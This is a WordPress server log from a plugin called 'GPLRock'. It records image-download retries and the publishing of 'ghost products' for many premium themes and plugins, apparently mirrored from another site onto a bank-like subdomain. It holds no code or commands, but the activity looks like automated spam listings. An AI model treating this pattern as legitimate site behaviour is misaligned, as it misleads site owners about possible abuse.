https://meldwp.com/wp-content/uploads/h-code-multipurpose-onepage--multi-page-template-22645.webp [09-Apr-2026 01:43:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: h-code-multipurpose-onepage-multi-page-template [09-Apr-2026 01:43:24 UTC] GPLRock: Image download failed for product ngo-charity-donation-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:26 UTC] GPLRock: Image download failed for product ngo-charity-donation-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ngo---charity-donation-wordpress-12793.webp for product ngo-charity-donation-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:43:28 UTC] GPLRock: Image download failed for product ngo-charity-donation-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:30 UTC] GPLRock: Image download failed for product ngo-charity-donation-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ngo---charity-donation-wordpress-12793.webp for product ngo-charity-donation-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:43:32 UTC] GPLRock WARNING: Image download failed for product ngo-charity-donation-wordpress. URL: https://meldwp.com/wp-content/uploads/ngo---charity-donation-wordpress-12793.webp [09-Apr-2026 01:43:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ngo-charity-donation-wordpress [09-Apr-2026 01:43:32 UTC] GPLRock: Image download failed for product simplio-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:34 UTC] GPLRock: Image download failed for product simplio-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simplio---creative-portfolio-wordpress-theme-13083.webp for product simplio-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:43:37 UTC] GPLRock: Image download failed for product simplio-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:39 UTC] GPLRock: Image download failed for product simplio-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simplio---creative-portfolio-wordpress-theme-13083.webp for product simplio-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:43:41 UTC] GPLRock WARNING: Image download failed for product simplio-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/simplio---creative-portfolio-wordpress-theme-13083.webp [09-Apr-2026 01:43:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: simplio-creative-portfolio-wordpress-theme [09-Apr-2026 01:43:41 UTC] GPLRock: Image download failed for product nill-elegant-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:43 UTC] GPLRock: Image download failed for product nill-elegant-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nill---elegant-ecommerce-wordpress-theme-30443.webp for product nill-elegant-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:43:45 UTC] GPLRock: Image download failed for product nill-elegant-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:47 UTC] GPLRock: Image download failed for product nill-elegant-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nill---elegant-ecommerce-wordpress-theme-30443.webp for product nill-elegant-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:43:49 UTC] GPLRock WARNING: Image download failed for product nill-elegant-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nill---elegant-ecommerce-wordpress-theme-30443.webp [09-Apr-2026 01:43:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nill-elegant-ecommerce-wordpress-theme [09-Apr-2026 01:43:50 UTC] GPLRock: Image download failed for product tumli-a-personal-masonry-style-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:52 UTC] GPLRock: Image download failed for product tumli-a-personal-masonry-style-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tumli---a-personal-masonry-style-wordpress-theme-310.webp for product tumli-a-personal-masonry-style-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:43:54 UTC] GPLRock: Image download failed for product tumli-a-personal-masonry-style-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:56 UTC] GPLRock: Image download failed for product tumli-a-personal-masonry-style-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:43:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tumli---a-personal-masonry-style-wordpress-theme-310.webp for product tumli-a-personal-masonry-style-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:43:58 UTC] GPLRock WARNING: Image download failed for product tumli-a-personal-masonry-style-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tumli---a-personal-masonry-style-wordpress-theme-310.webp [09-Apr-2026 01:43:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tumli-a-personal-masonry-style-wordpress-theme [09-Apr-2026 01:43:58 UTC] GPLRock: Image download failed for product degit-seo-digital-marketing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:00 UTC] GPLRock: Image download failed for product degit-seo-digital-marketing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/degit---seo-digital-marketing-wordpress-theme-15993.webp for product degit-seo-digital-marketing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:44:03 UTC] GPLRock: Image download failed for product degit-seo-digital-marketing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:05 UTC] GPLRock: Image download failed for product degit-seo-digital-marketing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/degit---seo-digital-marketing-wordpress-theme-15993.webp for product degit-seo-digital-marketing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:44:07 UTC] GPLRock WARNING: Image download failed for product degit-seo-digital-marketing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/degit---seo-digital-marketing-wordpress-theme-15993.webp [09-Apr-2026 01:44:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: degit-seo-digital-marketing-wordpress-theme [09-Apr-2026 01:44:07 UTC] GPLRock: Image download failed for product amping-camp-organizer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:09 UTC] GPLRock: Image download failed for product amping-camp-organizer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amping---camp-organizer-wordpress-theme-21099.webp for product amping-camp-organizer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:44:11 UTC] GPLRock: Image download failed for product amping-camp-organizer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:13 UTC] GPLRock: Image download failed for product amping-camp-organizer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amping---camp-organizer-wordpress-theme-21099.webp for product amping-camp-organizer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:44:15 UTC] GPLRock WARNING: Image download failed for product amping-camp-organizer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/amping---camp-organizer-wordpress-theme-21099.webp [09-Apr-2026 01:44:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amping-camp-organizer-wordpress-theme [09-Apr-2026 01:44:16 UTC] GPLRock: Image download failed for product snews-eye-catching-magazine-reviews-newspaper-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:18 UTC] GPLRock: Image download failed for product snews-eye-catching-magazine-reviews-newspaper-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/snews--eye-catching-magazine-reviews--newspaper-wordpress-theme-22977.webp for product snews-eye-catching-magazine-reviews-newspaper-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:44:20 UTC] GPLRock: Image download failed for product snews-eye-catching-magazine-reviews-newspaper-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:22 UTC] GPLRock: Image download failed for product snews-eye-catching-magazine-reviews-newspaper-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/snews--eye-catching-magazine-reviews--newspaper-wordpress-theme-22977.webp for product snews-eye-catching-magazine-reviews-newspaper-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:44:24 UTC] GPLRock WARNING: Image download failed for product snews-eye-catching-magazine-reviews-newspaper-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/snews--eye-catching-magazine-reviews--newspaper-wordpress-theme-22977.webp [09-Apr-2026 01:44:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: snews-eye-catching-magazine-reviews-newspaper-wordpress-theme [09-Apr-2026 01:44:24 UTC] GPLRock: Image download failed for product walker-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:26 UTC] GPLRock: Image download failed for product walker-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/walker---woocommerce-wordpress-theme-8470.webp for product walker-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:44:29 UTC] GPLRock: Image download failed for product walker-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:31 UTC] GPLRock: Image download failed for product walker-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Apr-2026 01:44:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/walker---woocommerce-wordpress-theme-8470.webp for product walker-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Apr-2026 01:44:33 UTC] GPLRock WARNING: Image download failed for product walker-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/walker---woocommerce-wordpress-theme-8470.webp [09-Apr-2026 01:44:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: walker-woocommerce-wordpress-theme [10-Apr-2026 00:43:04 UTC] GPLRock: Image downloaded successfully for product beige-pet-shop-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6debbb14.webp [10-Apr-2026 00:43:04 UTC] GPLRock: Using pre-downloaded image for product beige-pet-shop-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6debbb14.webp [10-Apr-2026 00:43:04 UTC] GPLRock: Ghost product published with image - Product ID: beige-pet-shop-woocommerce-elementor-template-kit [10-Apr-2026 00:43:05 UTC] GPLRock: Image downloaded successfully for product beetrix-pet-clinic-hospital-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7967f3a9.webp [10-Apr-2026 00:43:05 UTC] GPLRock: Using pre-downloaded image for product beetrix-pet-clinic-hospital-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7967f3a9.webp [10-Apr-2026 00:43:05 UTC] GPLRock: Ghost product published with image - Product ID: beetrix-pet-clinic-hospital-elementor-template-kit [10-Apr-2026 00:43:06 UTC] GPLRock: Image downloaded successfully for product actions-pack-premium-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-659497e0.png [10-Apr-2026 00:43:07 UTC] GPLRock: Using pre-downloaded image for product actions-pack-premium-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-659497e0.png [10-Apr-2026 00:43:07 UTC] GPLRock: Ghost product published with image - Product ID: actions-pack-premium-for-elementor [10-Apr-2026 00:43:07 UTC] GPLRock: Image downloaded successfully for product beautybox-subscription-box-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2bbba7d4.webp [10-Apr-2026 00:43:07 UTC] GPLRock: Using pre-downloaded image for product beautybox-subscription-box-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2bbba7d4.webp [10-Apr-2026 00:43:07 UTC] GPLRock: Ghost product published with image - Product ID: beautybox-subscription-box-elementor-template-kit [10-Apr-2026 00:43:08 UTC] GPLRock: Image downloaded successfully for product learnpress-assignments-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-245dfd26.webp [10-Apr-2026 00:43:09 UTC] GPLRock: Using pre-downloaded image for product learnpress-assignments-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-245dfd26.webp [10-Apr-2026 00:43:09 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-assignments-add-on [10-Apr-2026 00:43:09 UTC] GPLRock: Image downloaded successfully for product beautify-makeup-artist-hair-stylist-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ec3a6587.webp [10-Apr-2026 00:43:09 UTC] GPLRock: Using pre-downloaded image for product beautify-makeup-artist-hair-stylist-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ec3a6587.webp [10-Apr-2026 00:43:09 UTC] GPLRock: Ghost product published with image - Product ID: beautify-makeup-artist-hair-stylist-elementor-template-kit [10-Apr-2026 00:43:10 UTC] GPLRock: Image downloaded successfully for product beatkit-music-events-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4500d5a.webp [10-Apr-2026 00:43:10 UTC] GPLRock: Using pre-downloaded image for product beatkit-music-events-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4500d5a.webp [10-Apr-2026 00:43:10 UTC] GPLRock: Ghost product published with image - Product ID: beatkit-music-events-elementor-template-kit [10-Apr-2026 00:43:10 UTC] GPLRock: Image downloaded successfully for product learnpress-frontend-editor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5dc017ab.webp [10-Apr-2026 00:43:10 UTC] GPLRock: Using pre-downloaded image for product learnpress-frontend-editor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5dc017ab.webp [10-Apr-2026 00:43:10 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-frontend-editor [10-Apr-2026 00:43:11 UTC] GPLRock: Image downloaded successfully for product bean-barista-online-barista-course-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ac9295dd.webp [10-Apr-2026 00:43:12 UTC] GPLRock: Using pre-downloaded image for product bean-barista-online-barista-course-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ac9295dd.webp [10-Apr-2026 00:43:12 UTC] GPLRock: Ghost product published with image - Product ID: bean-barista-online-barista-course-elementor-template-kit [10-Apr-2026 00:43:12 UTC] GPLRock: Image downloaded successfully for product learnpress-2checkout-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-722daea4.webp [10-Apr-2026 00:43:12 UTC] GPLRock: Using pre-downloaded image for product learnpress-2checkout-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-722daea4.webp [10-Apr-2026 00:43:12 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-2checkout-add-on [10-Apr-2026 00:43:13 UTC] GPLRock: Image downloaded successfully for product bcare-baby-care-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8b4301bf.jpg [10-Apr-2026 00:43:13 UTC] GPLRock: Using pre-downloaded image for product bcare-baby-care-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8b4301bf.jpg [10-Apr-2026 00:43:13 UTC] GPLRock: Ghost product published with image - Product ID: bcare-baby-care-services-elementor-template-kit [10-Apr-2026 00:43:14 UTC] GPLRock: Image downloaded successfully for product icelander-accessible-business-portfolio-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46f85e89.jpg [10-Apr-2026 00:43:14 UTC] GPLRock: Using pre-downloaded image for product icelander-accessible-business-portfolio-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46f85e89.jpg [10-Apr-2026 00:43:14 UTC] GPLRock: Ghost product published with image - Product ID: icelander-accessible-business-portfolio-woocommerce-wordpress-theme [10-Apr-2026 00:43:15 UTC] GPLRock: Image downloaded successfully for product bazzer-influencer-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-71d8d793.jpg [10-Apr-2026 00:43:15 UTC] GPLRock: Using pre-downloaded image for product bazzer-influencer-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-71d8d793.jpg [10-Apr-2026 00:43:15 UTC] GPLRock: Ghost product published with image - Product ID: bazzer-influencer-marketing-agency-elementor-template-kit [10-Apr-2026 00:43:15 UTC] GPLRock: Image downloaded successfully for product database-cleaner-by-meow-apps (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3f347a55.png [10-Apr-2026 00:43:15 UTC] GPLRock: Using pre-downloaded image for product database-cleaner-by-meow-apps: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3f347a55.png [10-Apr-2026 00:43:15 UTC] GPLRock: Ghost product published with image - Product ID: database-cleaner-by-meow-apps [10-Apr-2026 00:43:16 UTC] GPLRock: Image downloaded successfully for product bake-bakery-cake-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ead7533c.webp [10-Apr-2026 00:43:16 UTC] GPLRock: Using pre-downloaded image for product bake-bakery-cake-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ead7533c.webp [10-Apr-2026 00:43:16 UTC] GPLRock: Ghost product published with image - Product ID: bake-bakery-cake-elementor-template-kit [10-Apr-2026 00:43:17 UTC] GPLRock: Image downloaded successfully for product simple-custom-css-and-js-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a7765e7e.jpg [10-Apr-2026 00:43:17 UTC] GPLRock: Using pre-downloaded image for product simple-custom-css-and-js-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a7765e7e.jpg [10-Apr-2026 00:43:17 UTC] GPLRock: Ghost product published with image - Product ID: simple-custom-css-and-js-pro [10-Apr-2026 00:43:18 UTC] GPLRock: Image downloaded successfully for product bahama-contractor-architect-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f03f0391.webp [10-Apr-2026 00:43:18 UTC] GPLRock: Using pre-downloaded image for product bahama-contractor-architect-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f03f0391.webp [10-Apr-2026 00:43:18 UTC] GPLRock: Ghost product published with image - Product ID: bahama-contractor-architect-elementor-template-kit [10-Apr-2026 00:43:19 UTC] GPLRock: Image downloaded successfully for product aquaterias-bottled-drinking-water-delivery-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-52b26c15.png [10-Apr-2026 00:43:19 UTC] GPLRock: Using pre-downloaded image for product aquaterias-bottled-drinking-water-delivery-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-52b26c15.png [10-Apr-2026 00:43:19 UTC] GPLRock: Ghost product published with image - Product ID: aquaterias-bottled-drinking-water-delivery-wordpress-theme [10-Apr-2026 00:43:21 UTC] GPLRock: Image downloaded successfully for product fluent-boards-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-62a768c3.png [10-Apr-2026 00:43:21 UTC] GPLRock: Using pre-downloaded image for product fluent-boards-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-62a768c3.png [10-Apr-2026 00:43:21 UTC] GPLRock: Ghost product published with image - Product ID: fluent-boards-pro [10-Apr-2026 00:43:23 UTC] GPLRock: Image downloaded successfully for product shopmagic-woocommerce-marketing-automation-workflows-and-more (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-74409f41.jpg [10-Apr-2026 00:43:23 UTC] GPLRock: Using pre-downloaded image for product shopmagic-woocommerce-marketing-automation-workflows-and-more: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-74409f41.jpg [10-Apr-2026 00:43:23 UTC] GPLRock: Ghost product published with image - Product ID: shopmagic-woocommerce-marketing-automation-workflows-and-more [11-Apr-2026 00:55:51 UTC] GPLRock: Image download failed for product fullpage-fullscreen-one-page-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:55:52 UTC] GPLRock: Image download failed for product cleangold-a-minimal-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:55:53 UTC] GPLRock: Image download failed for product fullpage-fullscreen-one-page-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:55:54 UTC] GPLRock: Image download failed for product cleangold-a-minimal-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:55:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fullpage---fullscreen-one-page-theme-22351.webp for product fullpage-fullscreen-one-page-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:55:55 UTC] GPLRock: Image download failed for product fullpage-fullscreen-one-page-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:55:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cleangold---a-minimal-responsive-wordpress-theme-21053.webp for product cleangold-a-minimal-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:55:56 UTC] GPLRock: Image download failed for product cleangold-a-minimal-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:55:57 UTC] GPLRock: Image download failed for product fullpage-fullscreen-one-page-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:55:59 UTC] GPLRock: Image download failed for product cleangold-a-minimal-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:55:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fullpage---fullscreen-one-page-theme-22351.webp for product fullpage-fullscreen-one-page-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:55:59 UTC] GPLRock WARNING: Image download failed for product fullpage-fullscreen-one-page-theme. URL: https://meldwp.com/wp-content/uploads/fullpage---fullscreen-one-page-theme-22351.webp [11-Apr-2026 00:55:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fullpage-fullscreen-one-page-theme [11-Apr-2026 00:55:59 UTC] GPLRock: Image download failed for product bagery-ice-cream-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cleangold---a-minimal-responsive-wordpress-theme-21053.webp for product cleangold-a-minimal-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:01 UTC] GPLRock WARNING: Image download failed for product cleangold-a-minimal-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cleangold---a-minimal-responsive-wordpress-theme-21053.webp [11-Apr-2026 00:56:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cleangold-a-minimal-responsive-wordpress-theme [11-Apr-2026 00:56:01 UTC] GPLRock: Image download failed for product yordy-directory-listings-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:01 UTC] GPLRock: Image download failed for product bagery-ice-cream-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:03 UTC] GPLRock: Image download failed for product yordy-directory-listings-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bagery---ice-cream-shop-wordpress-theme-20679.webp for product bagery-ice-cream-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:04 UTC] GPLRock: Image download failed for product bagery-ice-cream-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yordy---directory-listings-wordpress-theme-21135.webp for product yordy-directory-listings-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:05 UTC] GPLRock: Image download failed for product yordy-directory-listings-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:06 UTC] GPLRock: Image download failed for product bagery-ice-cream-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:07 UTC] GPLRock: Image download failed for product yordy-directory-listings-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bagery---ice-cream-shop-wordpress-theme-20679.webp for product bagery-ice-cream-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:08 UTC] GPLRock WARNING: Image download failed for product bagery-ice-cream-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bagery---ice-cream-shop-wordpress-theme-20679.webp [11-Apr-2026 00:56:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bagery-ice-cream-shop-wordpress-theme [11-Apr-2026 00:56:08 UTC] GPLRock: Image download failed for product focux-multi-purpose-single-product-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yordy---directory-listings-wordpress-theme-21135.webp for product yordy-directory-listings-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:09 UTC] GPLRock WARNING: Image download failed for product yordy-directory-listings-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/yordy---directory-listings-wordpress-theme-21135.webp [11-Apr-2026 00:56:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yordy-directory-listings-wordpress-theme [11-Apr-2026 00:56:09 UTC] GPLRock: Image download failed for product agora-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:10 UTC] GPLRock: Image download failed for product focux-multi-purpose-single-product-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:12 UTC] GPLRock: Image download failed for product agora-event-conference-wordpress-theme (attempt 2/3). HTTP 